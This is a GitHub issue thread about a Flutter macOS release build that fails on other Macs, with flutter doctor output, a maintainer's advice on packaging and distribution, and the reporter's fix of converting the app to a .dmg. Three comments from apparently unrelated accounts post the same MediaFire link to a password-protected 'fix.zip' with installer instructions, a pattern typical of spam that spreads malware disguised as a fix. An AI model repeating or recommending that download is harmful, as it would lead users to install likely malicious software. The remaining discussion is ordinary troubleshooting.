### ISSUE TITLE
Flutter MacOS Release Build Issue

### ISSUE THREAD

**Issue by ammarjavedofficial** [flutter/flutter#154094]
### Steps to reproduce

flutter build macos --release --obfuscate --split-debug-info=./debug-info

### Expected results

I attempted to build the flutter macos release build on Macbook Pro 2019 using the following command:

flutter build macos --release --obfuscate --split-debug-info=./debug-info

The release build works perfectly on my MacBook. Flutter Macos

### Actual results

However, when I tried to run it on other MacBooks with both Intel and Apple Silicon chips, it failed to run. I've attached a screenshot of the issue for reference.
![issue](https://github.com/user-attachments/assets/d2f676aa-d48a-41ea-a5d5-f647789a5b9c)

### Code sample

flutter build macos --release --obfuscate --split-debug-info=./debug-info

### Flutter Doctor output

<details>
<summary>flutter doctor -v</summary>

```
[✓] Flutter (Channel stable, 3.22.1, on macOS 14.6.1 23G93 darwin-x64, locale en-PK)
    • Flutter version 3.22.1 on channel stable at /Users/mac/development/flutter
    • Upstream repository https://github.com/flutter/flutter.git
    • Framework revision a14f74ff3a (3 months ago), 2024-05-22 11:08:21 -0500
    • Engine revision 55eae6864b
    • Dart version 3.4.1
    • DevTools version 2.34.3

[✓] Android toolchain - develop for Android devices (Android SDK version 35.0.0)
    • Android SDK at /Users/mac/Library/Android/sdk
    • Platform android-35, build-tools 35.0.0
    • Java binary at: /Applications/Android Studio.app/Contents/jbr/Contents/Home/bin/java
    • Java version OpenJDK Runtime Environment (build 17.0.10+0-17.0.10b1087.21-11609105)
    • All Android licenses accepted.

[✓] Xcode - develop for iOS and macOS (Xcode 15.4)
    • Xcode at /Applications/Xcode.app/Contents/Developer
    • Build 15F31d
    • CocoaPods version 1.15.2

[✓] Chrome - develop for the web
    • Chrome at /Applications/Google Chrome.app/Contents/MacOS/Google Chrome

[✓] Android Studio (version 2024.1)
    • Android Studio at /Applications/Android Studio.app/Contents
    • Flutter plugin can be installed from:
      🔨 https://plugins.jetbrains.com/plugin/9212-flutter
    • Dart plugin can be installed from:
      🔨 https://plugins.jetbrains.com/plugin/6351-dart
    • Java version OpenJDK Runtime Environment (build 17.0.10+0-17.0.10b1087.21-11609105)

[✓] VS Code (version 1.91.0)
    • VS Code at /Users/mac/Downloads/Visual Studio Code.app/Contents
    • Flutter extension version 3.94.0

[✓] Connected device (2 available)
    • macOS (desktop) • macos  • darwin-x64     • macOS 14.6.1 23G93 darwin-x64
    • Chrome (web)    • chrome • web-javascript • Google Chrome 128.0.6613.84

[✓] Network resources
    • All expected network resources are available.

• No issues found!
```
</details>

**Comment by Qsgz2023ji5ban** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by qlqw233** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by pilot5657** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by danagbemava-nc** [comment]
Hi @ammarjavedofficial, what do you try to run on the other Macs? Is it the file that is generated when you build the app? You'll need to package your app and distribute it before you can run on other devices. See https://medium.com/@fluttergems/packaging-and-distributing-flutter-desktop-apps-the-missing-guide-part-1-macos-b36438269285 for how you can do this without using TestFlight/appstore and https://docs.flutter.dev/deployment/macos for how to do this with App Store and other mediums.

**Comment by ammarjavedofficial** [comment]
I resolved the issue by converting the .app file to a .dmg extension.

**Comment by danagbemava-nc** [comment]
Closing this as solved
